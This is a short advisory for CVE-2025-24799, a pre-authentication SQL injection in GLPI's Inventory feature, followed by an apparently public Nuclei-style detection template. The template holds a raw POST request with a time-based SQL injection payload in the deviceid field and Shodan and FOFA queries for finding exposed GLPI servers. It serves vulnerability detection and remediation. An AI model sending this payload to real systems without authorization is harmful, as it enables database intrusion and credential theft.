A pre-authentication SQL injection vulnerability exists in the Inventory feature of GLPI. The vulnerability is caused by insufficient sanitization of user input in the handleAgent function when processing XML requests. The issue occurs because SimpleXMLElement objects can bypass the dbEscapeRecursive function, allowing an attacker to inject SQL queries. This can lead to unauthorized access to sensitive information in the database, including user credentials and potential authentication bypass.
PoC代码[已公开]
id: CVE-2025-24799
info:
name: GLPI < 10.0.17 - Pre-Auth SQL Injection
author: ritikchaddha
severity: critical
description: |
A pre-authentication SQL injection vulnerability exists in the Inventory feature of GLPI. The vulnerability is caused by insufficient sanitization of user input in the handleAgent function when processing XML requests. The issue occurs because SimpleXMLElement objects can bypass the dbEscapeRecursive function, allowing an attacker to inject SQL queries. This can lead to unauthorized access to sensitive information in the database, including user credentials and potential authentication bypass.
remediation: |
Upgrade to GLPI version 10.0.18 or later. If upgrading is not immediately possible, consider disabling the Inventory feature or restricting access to it.
reference:
- https://blog.lexfo.fr/glpi-sql-to-rce.html
- https://github.com/glpi-project/glpi/security/advisories/GHSA-p626-hph9-p6fj
- https://nvd.nist.gov/vuln/detail/CVE-2025-24799
classification:
epss-score: 0.65099
epss-percentile: 0.98429
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2025-24799
cwe-id: CWE-89
metadata:
verified: true
product: GLPI
max-request: 1
shodan-query: title:"GLPI"
fofa-query: title="GLPI"
tags: cve,cve2025,glpi,sqli,vkev
http:
- raw:
- |
POST /index.php/ajax/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/xml
<?xml version="1.0" encoding="UTF-8"?>
<xml>
<QUERY>get_params</QUERY>
<deviceid>', IF((1=1),(select sleep(7)),1), 0, 0, 0, 0, 0, 0);#</deviceid>
<content>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</content>
</xml>
matchers:
- type: dsl
dsl:
- 'duration>=7'
- 'status_code ==200'
- 'contains(header, "application/xml")'
- 'contains_all(body, "<status>ok", "REPLY>")'
condition: and
# digest: 490a00463044022027cb808c469d595c1287e23fa91bdba44d619d965934b87953fb126da42e0b0b02206faa9b3c1a94f6691e843c85a5c9c4121de0218f7ef8aa4640ea33f7d60f8d97:922c64590222798bb761d5b6d8e72950